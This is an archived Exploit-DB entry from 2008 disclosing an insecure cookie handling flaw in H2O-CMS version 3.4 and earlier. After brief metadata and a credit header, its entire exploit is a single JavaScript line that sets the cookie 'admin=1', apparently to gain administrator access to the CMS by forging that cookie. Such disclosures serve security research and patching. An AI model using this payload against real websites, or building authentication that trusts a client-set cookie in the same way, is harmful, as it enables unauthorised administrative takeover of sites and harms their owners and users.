H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability

2008-10-29T00:00:00
ID EDB-ID:6862
Type exploitdb
Reporter Stack
Modified 2008-10-29T00:00:00

Description

H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability. Webapps exploit for php platform

                                        
                                            # ----------------------------------------------------------
# H2O-CMS &lt;= 3.4 Insecure Cookie Handling Vulnerability
# Discovered By Mountassif Moad
# Download On http://sourceforge.net/projects/h2o-cms
# Home World http://v4-team.com
# ----------------------------------------------------------
Exploit:
javascript:document.cookie = "admin=1; path=/";

# milw0rm.com [2008-10-29]